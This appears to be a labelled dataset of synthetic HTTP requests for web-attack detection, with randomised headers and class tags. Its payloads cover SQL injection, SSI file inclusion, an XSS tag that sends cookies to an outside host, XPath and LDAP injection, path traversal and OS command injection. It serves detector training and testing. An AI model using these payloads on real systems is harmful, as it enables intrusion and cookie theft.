Referer: http://www.eod5avee.cz/cthn/lf9o/piu4gbe/Ee89ssA.cfm
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: 8aukaxL
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 072x540
Via: 1.7 www.oEEgSee.shtml, FTP/6.0 67.219.68.118
Transfer-Encoding: compress
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 76346
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35781
Start - Id: 41297
class: SqlInjection
GET /tgonTtDzr/rGeQlKUhP/tkh8r39Ofg5/nTlQ/tbxdhpsotesiO.htm? HTTP/1.0
Host: www.sbrRaktti.com
Connection: keep-alive
Accept: audio/basic, text/html;q=0.8, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: eumnoedL-mhquy0t;q=0.8, tndn03-ts, kesl-rl;q=0.5
Cache-Control: no-store
Client-ip: 5.85.153.146
Cookie: llr34=4134824881;m3erar=sErtoesaaamssd;anciicorpanzi=' )   UNION     ALL SELECT 'bat',782,7557,'ostIeyrms',6957  FROM   0rfonapi9   WHERE    (''   =   ';tfherpsrer=r tunchd r>k3t9
Cookie2: $Version="012"
Date: Sun, 26 Feb 06 20:09:13 UTC
ETag: "JhjNr2i1GthRTBS"
Expect: eiE7lece=iaq5e;ais3gwt=reznwiro
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Sun, 15 May 05 21:05:45 GMT
If-Unmodified-Since: Sun, 22 Apr 07 10:19:10 UTC
If-Match: "ao@lot5T@GtQeWiB-k7i"
If-None-Match: *
If-Range: Sat, 21 May 05 14:53:52 UTC
Max-Forwards: 4715
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d3fB77dE
Authorization: Digest algorithm=bonEh
Range: 1-,9-8
Referer: /nqtGstn.asmx
TE: gzip
Trailer: User-Agent
User-Agent: fUshL@CNHI http://www.oxnue.ch
UA-CPU: MIPS
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 5.8 195.97.144.183, HTTP/7.5 221.13.16.68:0807, FTP/0.9 www.q9ohatqe.jpg
Transfer-Encoding: compress
Upgrade: e1em/3.9, othbu/3.3, yin/5.4, shfedi/0.7
Warning: 991 www.oeOiE.shtml:7 "iedetaN" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: ----------------------------

null

End - Id: 41297
Start - Id: 39617
class: SSI
GET /raalcteirt5yto2/rJ0d/ge/iQyPF-rz3/TwrsyxnataoeoE/qiY/BW6cRH1includeOwgetUT/o6ocrnn9teeost.png?tn8ClpsOUhit=5&pere5Anulswte=363&os3rtsTst=-eHseo&3trocmrelptrOet=enm65stoeC0&s2ltxczt=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&srei=%29ic&8ns0eic2wsnb=mDrqtism&i9iyieewoi2aeof=ops3edhe HTTP/1.1
Host: www.eisiixsOoa.it
Connection: keep-alive
Accept: image/png, image/gif;q=0.1, application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: Irtxs='sheNqf'
Client-ip: 79.170.36.207
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="143"
Date: Sat, 28 Jan 06 03:01:21 GMT
ETag: W/"nXLxjQhgJIFjcXESD"
Expect: 100-continue
From: ts3vhh@kqzfn.com
If-Modified-Since: Thu, 26 Mar 09 04:29:11 UTC
If-Unmodified-Since: Thu, 07 Dec 06 14:15:59 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Mar 10 20:07:23 UTC
Max-Forwards: 14
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="a2a9"
Authorization: dgaeee pnrlGesS=2gnbsbl
Range: 973-,-4,32221-
Referer: /asodi/alrnexri/hadeerA/h11kr/hqSy.pl
TE: gzip;q=0.5
Trailer: Accept-Language
User-Agent: Mozilla/8.7 (Machintosh; U; Mac OS X 0.3; mN-ro; rv:5.0.8) Gecko/97136402
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 7.4 98.121.154.130, HTTP/8.7 www.8cgte.js
Transfer-Encoding: compress
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39617
Start - Id: 47314
class: XSS
GET /6aorhwkth/sjjS1UpJDK4Js/n5ouatlsou.htm?o1tolo0Mnitt=732395&dru=%3Cimg+++dynsrc+%3D++++%22javascript%3A%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.llletore.com%2Fcgi-bin%2Fndil.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E&useeoeAn=rY2F3 HTTP/1.1
Host: 154.157.236.225
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.4, identity;q=0.7, identity
Accept-Language: yssnsvh-olrrnher, 1t-qa6ahd, ihpor-ei;q=0.7, piil6mAn-Ptio;q=0.3, dc8u-ee;q=0.9
Cache-Control: max-stale=18078
Client-ip: 107.154.88.110
Cookie: octrfEElophoih=670;inziylo=uEiN;letsej6eee=2Navebe;ttqeed=cscripteinclude nodeb3qb;n3teORtfliw1=mNsa7T0;e$ei;5qnHiwnrtd=944184
Cookie2: $Version="508"
Date: Fri, 06 Nov 09 13:58:13 GMT
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: 100-continue
From: ntsn@eneotga.ch
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Mon, 23 Mar 09 22:34:42 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Jul 04 18:02:18 GMT
Max-Forwards: 996
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest response="BbDAcFc4FE090Ca5a2615b8cD172Fd4B"
Range: 498-
Referer: http://iFcse.gov/hceAaao/enoeA/tosnrtn/unene/dStne7.txt
TE: chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/4.1 (Machintosh; U; Mac OS X 6.8; ol-am; rv:6.7.6) Gecko/50486337
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/8.4 232.168.110.151, 7.2 www.reean3ty.jpeg
Transfer-Encoding: lgxk
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 18.209.187.11
X-Serial-Number: 126620
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47314
Start - Id: 48704
class: XPathInjection
POST /eWMxy38QjCcKVcFtkbH/sQVHB_ml_nw-0tu/qyigsemeDFrnhetanso/snr2niS/r7smd2nx3I9n/style@TrRT./7rRQGxWT55Ni2f_Z5E9/urO6cW2Ts.qZ/tDayk3.selectform2Nvar/iryosdebst3a/atvEsCCvMqI/it.html? HTTP/1.1
Content-Length: 324
Content-Language: orraneti,etx
Content-Encoding: compress
Content-Location: /Snspgits/lrst7g.nsf
Content-MD5: YW5hQWxiZTducmVvZDR0cw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 10:11:10 GMT
Last-Modified: Mon, 30 Nov 09 03:23:19 GMT
Host: www.tsbolS2h.net
Connection: daeg
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9
Accept-Language: lJ-gD, kFe-nijrsor
Cache-Control: min-fresh=69
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="5"
Date: Tue, 03 May 05 03:22:56 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: 100-continue
From: Wquiz@fowi.gov
If-Modified-Since: Sun, 05 Nov 06 01:55:38 GMT
If-Unmodified-Since: Thu, 25 Sep 08 02:22:28 GMT
If-Match: *
If-None-Match: "wjgX@SBRvJhk.LIdy"
If-Range: Wed, 30 Jan 08 01:52:25 UTC
Max-Forwards: 9
MIME-Version: 7.4
Pragma: s2ei='Hh'
Proxy-Authorization: Digest realm
Authorization: Basic ZnBnd3Q6b25sZVg=
Range: 522185-0,03103-
Referer: http://www.hWlij.it/Tmhdsl/76Ekis5t.jpg
TE: deflate;q=0.7,deflate;q=0.0,chunked
Trailer: Expect
User-Agent: yxeqdi0q_2 http://www.eitetas.org
UA-CPU: Sparc
UA-Disp: 2550,506,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 640x9904
Via: FTP/9.5 147.128.174.155, obhE/6.7 41.161.168.141, HTTP/7.7 4.234.87.153:4034
Transfer-Encoding: compress
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 231.51.107.90
X-Serial-Number: 70312364698710750668
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

1I5hW0Y=sdfheeB&h95E5tyEded=nann/n/uy/child::node()[ position()=6] |    slxaen/bO/loe/child::text()[position()=5]     or  'coaryl'    =  '&7tsr1tt9t=hrntijhdnHnh2ymd&it=7906&usnedcnomaemcya=873&turmtl=l8fwwefele&S8fi=n1ourlqheoy4zn1ob5&62stdinR=9197451&sE9P=66609353

End - Id: 48704
Start - Id: 49727
class: XPathInjection
GET /oYOqYM7@-S/o75-/mf@cN94yqOM/de/rmGuVy24fo/x6lQXLVXC_0u/ltofshsnNsee1aao4t/Hnrh7th/o.s3NU/au@d3uO-SwmKrjMCoqL/_9dtmpez.js?eohotxivyob5eE=fhsystemosock_streamhose&ratitei4ts=rt%2FTwheafaabih&dhrnitt=12426411&Omeet=3933785&it=69057146&6noqoz4hans=28+++or+e%2Fgubn%2Fcgraef%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+++++or+59252%3D&KPPRQC=573&on=380&3on7tVd=ea4tead%5Dr&lVHae=oueevale%28+Et HTTP/1.1
Host: 156.32.113.77:12
Connection: keep-alive
Accept: text/*, text/*;q=0.4, image/gif
Accept-Charset: utf-7;q=0.1, koi8;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7190
Client-ip: 173.103.247.250
Cookie: gahEzdoooegq=s0dYvreorI;rUClsC=o0;2sluh3eeoEo=08822
Cookie2: $Version="0"
Date: Fri, 25 Jul 08 10:21:50 GMT
ETag: "JYMP4D0.htFnvfn"
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Fri, 07 Dec 07 19:25:54 UTC
If-Unmodified-Since: Tue, 08 Dec 09 02:01:09 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 May 06 10:21:04 GMT
Max-Forwards: 2678
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: NTLM bHdycmRnbWVyYXJzZXR0a28zOU0ybW1yZmVoZ3dlZXRw
Range: -37003,-5,-1
Referer: /oa5e/Ntgiisc.js
TE: trailers
Trailer: Via
User-Agent: tsuhua4wc (hdZsMcaI)
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 9.9 www.teez.gif, 6.7 www.wlycsnOx.js, 4.7 www.leys.png
Transfer-Encoding: deflate
Upgrade: 2sv/4.0, uetOn/7.3
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49727
Start - Id: 49891
class: XPathInjection
GET /tle/hvrcepjeilElshei/lvkDxP0gOT2ahrF/1byshthR/ssrn.cgi?RsDeO4ml=5701&rshatSweestlrg=ctaf%27++or++6+++++%3C+count%28path%2Fchild%3A%3A*%29++++or+++%27utazcc%27%3D+++%27&7yma=nl&fStcDidtla=alM&0dp=samilinkee&oaeldHGaoeerthu=1841 HTTP/1.0
Host: 187.169.103.221
Connection: mtelzq
Accept: */*;q=0.3
Accept-Charset: iso-8859-4, iso-8859-1;q=0.4, x-mac-hebrew
Accept-Encoding: *;q=0.4
Accept-Language: usbneg-el;q=0.9
Cache-Control: max-age=20
Client-ip: 222.216.7.189
Cookie: rsessaLvea7hd=ms;ferroid=9674;nljaoo1yWEze=4;betweenoptXt=mh;;fRwqKopenbhaR=rbM0nd9Pb7
Cookie2: $Version="614"
Date: Sat, 19 Mar 05 08:37:14 UTC
ETag: W/"79-wqobJXvLTgCDO1"
Expect: 3ms1era
From: ldlcym@E8Sinechia.ch
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Fri, 05 Aug 05 24:01:21 UTC
If-Match: "U3@PHktW39edFan-vzf."
If-None-Match: "AlcXNctY-E.3B4V_iDLw"
If-Range: "wprpgx.JTyvvy.E"
Max-Forwards: 241
MIME-Version: 6.4
Pragma: hetuH='8erunlvr'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest qop=auth-int
Range: -997,889715-,62803-
Referer: /qldeyti/rtgeUni/efusay/swnNac/mwgaf859.php
TE: trailers
Trailer: User-Agent
User-Agent: etopnodo2Rleliaoatn6
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 7.6 www.Adssrrw.js, 2.6 34.199.106.40
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49891
Start - Id: 48166
class: XSS
GET /ps/aofRes1ee/in/i0Aaakiudssm4beegers/a1tdnL5nxf/rVBNbTwu-2/izj2cnTgd8JAmoiXuNlM/rYaB_0xSF6J8rk2/7I1ABFn5VptrZZo5fu/tserEh/lterte7posT/s4uunqIUZknI2_u1.shtml?6oe5ulp=%3Ca+href++%3D+++%22++about%3A%3Cs%26%2399%3Bript%3E%5Balert+%28%27ne%27%29%3B%5D%3C%2Fscript%3E+++%22+%3E&h6attEtom4Paam=754899&sNuFui8tnri=img&rb6wo9Topen-1h=4&rein=o2tsaetggnls&ni9eol=arautoexec2sr%5C%40eo+anddofwos HTTP/1.1
Host: www.5otn.de
Connection: close
Accept: */*;q=0.1
Accept-Charset: ks_c_5601-1987;q=0.3
Accept-Encoding: *
Accept-Language: la822-nii8, ebeedwe-7o;q=0.2, ot-Tcec, e-MNedibhr, Naavr0ti-hiti09ia;q=0.5
Cache-Control: only-if-cached
Client-ip: 238.195.35.222
Cookie: fidngao1A=r7sock_streamsar tee[wheree;t0nTee7sdc=e0v$atuD;1Habwheremxi0fTnph-=2;f6y=6825726;nrteroendta0e9o=9autoexech
Cookie2: $Version="6"
Date: Sat, 29 Mar 08 11:49:46 UTC
ETag: W/"wLLWa.uJcLAhn76"
Expect: 100-continue
From: sfatroh@4tt9delj7a.org
If-Modified-Since: Tue, 22 Feb 05 20:22:23 GMT
If-Unmodified-Since: Tue, 21 Oct 08 07:14:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 31 Dec 05 16:00:02 CET
Max-Forwards: 7127
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest response="aBdf4fC95F1B9FE4Ca730b253131D207"
Authorization: NTLM dHJrZWRhZDlzZXR5b2VlYWJUSm1sZHNRbXRpaG5ldG5sbG90
Range: 248-
Referer: /Elafr/relwdi.shtml
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/4.9 (Windows; U; WinNT 6.6; 1s-ov; rv:4.6.7) Gecko/72320737
UA-CPU: MIPS
UA-Disp: 472,3569,8
UA-OS: Win98
UA-Color: color16
Via: Xtp/2.8 68.47.189.195, FTP/8.0 106.168.39.64
Transfer-Encoding: deflate
Warning: 110 www.gonm.png:285 "e4neSfElotnmne" 
X-Forwarded-For: 129.132.255.71
X-Serial-Number: 532844106814003
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48166
Start - Id: 46426
class: PathTransversal
GET /Nsm6vRhtddeizn/ei4xboin7c9elem1eb/87ziiaoeoe7Ao36j/txtel/TopoiU9aiillbcgeoerl/iaeefhau/mrhzTTn2l/eT0_ErRv.yhm/WUMDnz7ZvhiK/herls0doTeT5dpgtcf.nsf?ylziAosmEnw=%28hl&aWRafdA7a0=ingiikhdd5&iuiog3IL=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&uiRcariHteess=nipdartttCUrls HTTP/1.0
Host: 202.151.250.131
Connection: keep-alive
Accept: text/*
Accept-Charset: iso-2022-jp;q=0.6, iso-8859-5;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.211.79.221
Cookie: uy=r2vIA;frdth=em;yLVbmmail07=6;c5bzb@httpo7=wdtfIAswonrdsdnace;7hdnsm=je0;@NconnectExBF=KooiaLh
Cookie2: $Version="5"
Date: Wed, 27 Sep 06 20:20:23 GMT
ETag: W/"XIiewbCLFzVu.Q-Jm"
Expect: rgnRrl
From: ore8y@Ydkeykr.uk
If-Modified-Since: Sun, 06 Sep 09 02:42:42 UTC
If-Unmodified-Since: Wed, 17 Feb 10 09:00:34 UTC
If-Match: *
If-None-Match: "N40cT6USyaGY3QoONv92"
If-Range: "oY.MRtACTt1v6CSmHV"
Max-Forwards: 070
MIME-Version: 3.3
Pragma: pes='Jgt1rt'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW1laWhUYnNzRTJmZXB3c250aWV3c3NleXd6a2JwOHN3OW9ncw==
Range: 3341-,1-,7-
Referer: http://www.yyTcdrt.ch/qHtMo43/efuretOg/uleja.php4
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.3 (X11; U; Open BSD i386 0.6; fo-ia; rv:2.4.5) Gecko/45249571
UA-CPU: x86
UA-Disp: 5419,5549,32
UA-OS: FreeBSD
Via: 2.1 www.ustde.gif:26, HTTP/8.0 www.ehreseu0.css, 8.4 49.104.199.85:192
Transfer-Encoding: identity
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 223 232.197.120.51 "npays3" "Wed, 14 Jun 06 02:27:53 UTC"
X-Forwarded-For: 242.103.195.112
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46426
Start - Id: 38958
class: LdapInjection
GET /4rccc4Aaoutsie2hs/anebmntgdpEsnor/h4N947Tj-XDQwgk4Fh3R.aspx?UsrjeT1OaaoL=%29%28+%7C+++%28aen%3DeaaSg*%29&nr=1665&htpassZg2dJZbj=ei+Br&lreSc9ihohaui=cTD&idMBsW=r1imglinklo%2B%26s%5Dl%3B&snt=44115160&4erd=etcyh3r&sR=370105&egRisystemsD=9788316257&AK=aaDcl3O&htKeVm=ckc&7rjaaqc=86&bsdgsoxoomeks=esyesnttbihe0Uontx&sledatsinorwli=7184719534&emrn=5998 HTTP/1.1
Host: 99.140.254.189
Connection: qiis
Accept: text/xml
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=14
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="965"
Date: Fri, 06 May 05 18:17:07 GMT
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Mon, 15 May 06 21:03:14 GMT
If-Unmodified-Since: Sat, 20 Jan 07 04:20:01 CET
If-Match: *
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: *
Max-Forwards: 2008
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="nisso"
Authorization: Digest opaque="Ehnf"
Range: -764,-7
Referer: http://edoNtgie.gov/oilld.css
TE: deflate;q=0.2
Trailer: If-Match
User-Agent: dfdGZK http://www.bqoriseU.net
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38958
Start - Id: 38840
class: LdapInjection
GET /nP@8h3jnD1EM4L33MN./ielw/lRqFNAbkMTT/b1tst7e/eis5nef/ozAxpasswdrMor@Q1/v9MBQQ1PQu1yTvs3.s/CRkcW.SJ5l84/sedhon3s/h6hz1tRQs/eafdUti/0Vnb1j-D.tiff?igzWab1Iti=5&1nhHdeaeo6pnlm=s1iu&amieeotnhuti=r7%29%28%26%28objectClass++%3D+otk*%29 HTTP/1.1
Host: 221.64.137.17
Connection: ai3oox0
Accept: video/quicktime;q=0.0, text/*;q=0.3, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=459
Client-ip: 247.197.51.53
Cookie: I@LSqTw=eLXmq.;Lbpionenc=EolatfuiqAaaSabhre
Cookie2: $Version="98"
Date: Wed, 02 Jan 08 07:55:40 GMT
ETag: W/"b8iI30owSuLZ2t5gMvqm"
Expect: 100-continue
From: oeee@geqtla3o.org
If-Modified-Since: Wed, 20 Oct 04 10:41:46 UTC
If-Unmodified-Since: Sat, 06 Oct 07 02:08:42 CET
If-Match: *
If-None-Match: *
If-Range: "4sgc7PzaIXD3Qy4z@Npk"
Max-Forwards: 88
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Digest realm
Range: -83,96723-251385,-0483
Referer: /sobera/uwonn.cfm
TE: gzip;q=0.5,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.2 (X11; U; Solaris 9.1; n4-ji; rv:3.4.4) Gecko/58837232
UA-CPU: PowerPC
UA-Disp: 1599,031,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: FTP/3.8 148.150.156.63, HTTP/6.3 111.10.246.166, necr/4.9 www.r8o1sf.htm
Transfer-Encoding: deflate
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 465738
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38840
Start - Id: 49866
class: XPathInjection
GET /wgI_lstjmochaJLkBr/ohDndihdat/PS3dLdPls/RDknullh@UxoptJ8ptelnet8.js?6neesedTsj61w=674234983&hre=a_fYSK&weekattiyhtoe=oroitlt%27+or++1%3C+ieRn%2F2iamnT%2Fam%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D116%5D+++or++++%27nrdtssn%27+++%3D++++%27 HTTP/1.0
Host: www.ApLIil8h.biz
Connection: close
Accept: */*;q=0.7
Accept-Charset: hz-gb-2312, x-mac-korean, euc-cn;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 45.244.106.212
Cookie: QAfP238includePnode= mtk 0etc;gs=oat;uBoZAlhavingJ=frsilbreoeR;SmmidDiss5iy1ya=plOe?rli0swget?s+r~s;w7it80vboot.iniMmhK=ah&sosinputu e8R9;ir0zmreilE=es$eo 
Cookie2: $Version="5"
Date: Fri, 20 Oct 06 10:39:21 UTC
ETag: "xcInQ_66Zglzx9B"
Expect: lbaehdv
From: eslc7@67owp.net
If-Modified-Since: Sun, 16 Sep 07 02:49:10 CET
If-Unmodified-Since: Thu, 28 May 09 03:12:12 UTC
If-Match: *
If-None-Match: *
If-Range: "3oI85smExYicW8c7yHH_"
Max-Forwards: 93
MIME-Version: 4.0
Pragma: str='estaal'
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: NTLM ZWVqV3N1OWVUYXJxc3puaXFzUmJlaWExZHRldG5maXR4ZTF0ZQ==
Range: 40331-8,658595-,136-
Referer: /osi6qdy/TtsnG/K9micfc1.msf
TE: trailers
Trailer: Accept-Encoding
User-Agent: rlrEoqam2g (aFGxQ.; tVARQ6xie)
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 5.2 135.250.4.51:62, 1.9 www.dhnth0F.png, HTTP/2.4 www.etsnmah.shtml:9724
Transfer-Encoding: gzip
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 968 www.Iurrcesn.jpg "rFd4tdex5ohayei4iC" "Wed, 21 Nov 07 23:43:23 CET"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49866
Start - Id: 42891
class: OsCommanding
GET /cqhfDeha9w/5NX4YP6Do_O9Z8m/q2iphmupkfl/chBWf@ViXD2/t2_/ipaEeOa1et/a9G7/USG6e60ggvbscript2u/0rmHDnyYavJaF_/bas35/EHp5v7gh5ttscaua/qOr24xRf.html?ylrgl=tds&j8QacAsgrsw=27.175.164.167+%7Cdir%2Bc%3A%5C HTTP/1.0
Host: www.erSau.cz
Connection: keep-alive
Accept: audio/x-wav;q=0.1, application/*;q=0.2, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.9, compress;q=0.2, compress
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 133.170.78.11
Cookie: E6l9=ul;ncadmineerndtriro1;ssneouIw=xr4e;xsb3ie4e=0;ui=p%sor;r0xG3I6ox=mtt=a;leg2sdozgFIzaqi=ftp&
Cookie2: $Version="01"
Date: Thu, 21 Apr 05 12:01:15 UTC
ETag: W/"hxVAw7ycEWOOXXaqjbU"
Expect: tlgm
From: 2yoeb@2treday.de
If-Modified-Since: Thu, 04 Jun 09 09:27:57 GMT
If-Unmodified-Since: Sun, 03 May 09 03:17:04 UTC
If-Match: "WLguFANUa.fEYhpxz"
If-None-Match: *
If-Range: "KWdOcJGPtcsWsuhqKCXt"
Max-Forwards: 67
MIME-Version: 1.5
Pragma: ln5cst='spt'
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: Basic bWF0UzppYXVpYWlsdA==
Range: -057067,0-214264
Referer: http://adie.be/qWaesm/7Uuysss/saE4.exe
TE: gzip;q=0.0
Trailer: Upgrade
User-Agent: Mozilla/3.8 (compatible; eteonRiuee; Windows NT; eRaoufsi; nnih; 9ppo)
UA-OS: Win98
UA-Color: color8
UA-Pixels: 4835x5695
Via: 5.0 242.240.123.253, 3.1 104.254.236.200:42, 2.5 165.19.12.44
Transfer-Encoding: gzip
Upgrade: se2e/5.7, aFn/6.1, nsr3i/8.1, n5rtn/7.7, de7esn/5.5
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 78656393058950306
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42891
Start - Id: 48404
class: XPathInjection
GET /s_nI5vETrPw6Ode/p@2EcGsou@/jtRmemetmcee8TJlttln/86-V/nOqfsy/JN/i8iiroaeenuthucgbos7/iiFGceHw/c_/I.TlGBcG7/L-wP/9mtheao3.png? HTTP/1.1
Host: www.oe2mf.de:80
Connection: close
Accept: video/*
Accept-Charset: big5;q=0.3
Accept-Encoding: gzip;q=0.9, deflate;q=0.3, compress;q=0.5, compress;q=0.8, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 86.52.133.146
Cookie: d6atDbbeEhH9e=Mnti3;1b6eh=69534535;rbwBid=mau4']  |     P   | //user[  name/text(  )  ='TtAl;j10lmi=39441114;Iw.Ft1passwddKOUU=yt2og28R3RlC
Cookie2: $Version="774"
Date: Sat, 19 Sep 09 15:09:30 CET
ETag: W/"3JZKHMWjRGs1-oN_n7"
Expect: 100-continue
From: eqqzrto@asp4.biz
If-Modified-Since: Sat, 16 Aug 08 02:57:33 GMT
If-Unmodified-Since: Sun, 04 Jan 04 16:33:42 GMT
If-Match: "PvM-LUbwYinwx_XZK"
If-None-Match: *
If-Range: "3Ph2z1LTbYU5cem"
Max-Forwards: 781
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM ajJuYmgwbXlwZTNJZXR6Ymx2OGluNWJzQ0ludHNrbnNiNQ==
Authorization: Digest opaque="iboi"
Range: 32-
